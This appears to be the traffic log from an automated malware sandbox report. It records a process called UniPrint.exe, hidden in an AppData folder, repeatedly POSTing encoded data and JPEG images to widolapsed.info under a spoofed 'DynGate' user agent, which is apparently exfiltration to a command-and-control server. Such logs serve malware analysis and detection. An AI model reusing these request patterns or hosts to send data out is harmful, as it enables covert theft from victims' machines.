                                                                                                      2021-09-15 11:46:24 UTC1804OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:24 UTC1820OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:24 UTC1836OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:24 UTC1852OUTData Raw: 3c 46 e7 80 a4 fe 15 a2 75 2d 3e 3f f5 76 a4 fd 69 0e b8 17 fd 55 ac 63 eb 47 b4 a8 f6 88 7b 0a 6b 79 15 16 d2 76 e9 19 fc aa dd a6 9b 71 e6 86 28 7a d4 6d ae dd 1f ba 11 7e 82 98 9a ad e3 c8 b9 94 e0 9e c2 a6 4a b3 46 94 d5 08 c9 6e cb 9e 33 5d b0 da 83 e9 5c be 9f ff 00 21 1b 7f fa e8 b5 d3 78 c4 96 b6 b4 27 a9 5a e6 74 ff 00 f9 08 db ff 00 d7 41 fc e9 61 ff 00 80 75 d6 fe 31 e8 5a 8a 5b 99 83 4d 28 53 8e 95 48 cd a6 c7 d5 c9 aa de 24 24 5e ae 0f f0 d6 2f 5e f5 85 0a 1c d0 4d b2 71 38 ce 4a 8e 2a 27 40 75 3d 3d 3e e4 44 d3 0e b9 12 ff 00 ab b7 15 85 45 6e b0 b0 ea 72 3c 7d 5e 86 c3 6b f3 7f 04 6a 2a 07 d6 6e db a3 63 e9 59 d4 55 2c 3d 35 d0 c9 e2 eb 3e a5 b6 d4 2e 5f ef 4a df 9d 37 ce 91 ba b9 3f 8d 57 a7 2d 5f b3 8a d9 12 ab 4d ee c9 77 13 d4 9a 5c d3
                                                                                                      Data Ascii: <Fu->?viUcG{kyvq(zm~JFn3]\!x'ZtAau1Z[M(SH$$^/^Mq8J*'@u==>DEnr<}^kj*ncYU,=5>._J7?W-_Mw\
                                                                                                      2021-09-15 11:46:24 UTC1868OUTData Raw: 00 4a 28 a2 80 0a 28 a2 80 16 8a 4a 28 01 69 69 b4 b4 08 5a 4a 28 a0 05 cd 14 94 50 02 d1 49 45 00 2d 14 51 40 0b 45 25 2d 31 05 2d 25 14 c0 28 a2 8a 40 14 51 45 00 14 51 45 00 14 b4 94 50 02 d1 49 4b 4c 02 8a 28 a0 42 d1 49 45 00 2d 14 94 50 02 d1 49 45 00 2d 14 51 40 05 14 51 4c 42 d2 51 45 00 2d 14 51 40 05 14 51 40 05 14 51 40 0b 45 20 a5 a6 20 a5 a4 a3 34 00 b4 52 66 8a 00 5a 33 49 45 00 2e 68 a4 a5 a0 41 45 14 50 01 4b 49 4b 4c 02 96 92 8a 00 5e f4 51 45 00 14 52 52 d3 01 68 a4 a2 81 0b 45 25 2d 00 2d 14 94 53 10 b4 51 45 00 2d 25 19 a2 80 16 8a 28 a0 02 96 92 8a 00 5a 05 25 2d 31 0b 46 69 28 a6 21 73 46 69 28 a0 07 66 8a 6d 2d 17 0b 0b 46 69 33 49 9a 2e 16 1d 9a 33 4d cd 14 5c 2c 3f 34 66 9b 46 69 dc 56 1d 9a 4c d3 69 73 4a e3 b0 b9 a5 cd 36 93 34
                                                                                                      Data Ascii: J((J(iiZJ(PIE-Q@E%-1-%(@QEQEPIKL(BIE-PIE-Q@QLBQE-Q@Q@Q@E 4RfZ3IE.hAEPKIKL^QERRhE%--SQE-%(Z%-1Fi(!sFi(fm-Fi3I.3M\,?4fFiVLisJ64
                                                                                                      2021-09-15 11:46:24 UTC1878OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 35 35 38 39 39 34 33 35 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1255899435--
                                                                                                      2021-09-15 11:46:25 UTC1878INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:24 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=67d0baf06f69b1861a838cdf7628b63d647729694fc1eb6f12b3e2b0802f3ee9; expires=Thu, 15-Sep-2022 11:46:25 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:25 UTC1879INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      24192.168.2.34981145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:26 UTC1879OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76639
                                                                                                      Content-Type: multipart/form-data; boundary=--------3577760510
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:26 UTC1879OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 37 37 36 30 35 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3577760510Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:26 UTC1879OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 9b d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:26 UTC1879OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:26 UTC1895OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:26 UTC1911OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:26 UTC1927OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:46:26 UTC1943OUTData Raw: 92 96 8a 00 4a 28 a2 80 0a 28 a2 80 16 8a 4a 28 01 69 69 b4 b4 08 5a 4a 28 a0 05 cd 14 94 50 02 d1 49 45 00 2d 14 51 40 0b 45 25 2d 31 05 2d 25 14 c0 28 a2 8a 40 14 51 45 00 14 51 45 00 14 b4 94 50 02 d1 49 4b 4c 02 8a 28 a0 42 d1 49 45 00 2d 14 94 50 02 d1 49 45 00 2d 14 51 40 05 14 51 4c 42 d2 51 45 00 2d 14 51 40 05 14 51 40 05 14 51 40 0b 45 20 a5 a6 20 a5 a4 a3 34 00 b4 52 66 8a 00 5a 33 49 45 00 2e 68 a4 a5 a0 41 45 14 50 01 4b 49 4b 4c 02 96 92 8a 00 5e f4 51 45 00 14 52 52 d3 01 68 a4 a2 81 0b 45 25 2d 00 2d 14 94 53 10 b4 51 45 00 2d 25 19 a2 80 16 8a 28 a0 02 96 92 8a 00 5a 05 25 2d 31 0b 46 69 28 a6 21 73 46 69 28 a0 07 66 8a 6d 2d 17 0b 0b 46 69 33 49 9a 2e 16 1d 9a 33 4d cd 14 5c 2c 3f 34 66 9b 46 69 dc 56 1d 9a 4c d3 69 73 4a e3 b0 b9 a5 cd
                                                                                                      Data Ascii: J((J(iiZJ(PIE-Q@E%-1-%(@QEQEPIKL(BIE-PIE-Q@QLBQE-Q@Q@Q@E 4RfZ3IE.hAEPKIKL^QERRhE%--SQE-%(Z%-1Fi(!sFi(fm-Fi3I.3M\,?4fFiVLisJ
                                                                                                      2021-09-15 11:46:26 UTC1954OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 37 37 36 30 35 31 30 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3577760510--
                                                                                                      2021-09-15 11:46:27 UTC1954INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:26 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=5eaebc8002b5a3bf935beed88b34a9f53d14ee1f01378b1c6071a165192911fe; expires=Thu, 15-Sep-2022 11:46:26 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:27 UTC1954INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      25192.168.2.34981345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:27 UTC1954OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76833
                                                                                                      Content-Type: multipart/form-data; boundary=--------4017631281
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:27 UTC1955OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 31 37 36 33 31 32 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4017631281Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:27 UTC1955OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 d9 d3 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:27 UTC1955OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:27 UTC1971OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:27 UTC1987OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:27 UTC2003OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:46:27 UTC2019OUTData Raw: 33 45 01 61 73 46 69 b9 a5 cd 17 0b 0b 9a 4c d2 66 93 34 5c 76 1d 9a 33 4d cd 19 a2 e1 61 d9 a5 cd 33 34 66 8b 85 87 66 8c d3 73 49 9a 2e 16 1d 9a 4c d2 66 93 34 ae 3b 0e cd 14 dc d1 9a 57 0b 0b 49 49 46 68 1d 82 8a 33 49 48 61 9a 4c d1 45 21 85 14 94 66 90 58 5a 29 33 49 9a 77 0b 0b 45 34 9a 4c d2 b9 56 1d 9a 29 b4 b9 a5 70 b0 b4 53 73 46 68 0b 12 0e 94 52 03 45 51 20 69 33 41 a6 d4 b6 52 42 e6 8a 4a 0d 17 00 a2 92 8a 43 1d 45 25 2d 31 15 69 68 a2 b1 36 0a 28 a2 80 0a 28 a2 80 0a 28 a4 a0 05 a2 8a 28 00 a2 8a 28 00 a2 8a 29 80 b4 52 51 40 0b 49 4b 45 00 25 14 51 40 05 14 51 40 0b 45 25 14 00 b4 b4 da 5a 04 2d 25 14 50 02 e6 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 05 a2 92 96 98 82 96 92 8a 60 14 51 45 20 0a 28 a2 80 0a 28 a2 80 0a 5a 4a 28 01 68 a4 a5 a6 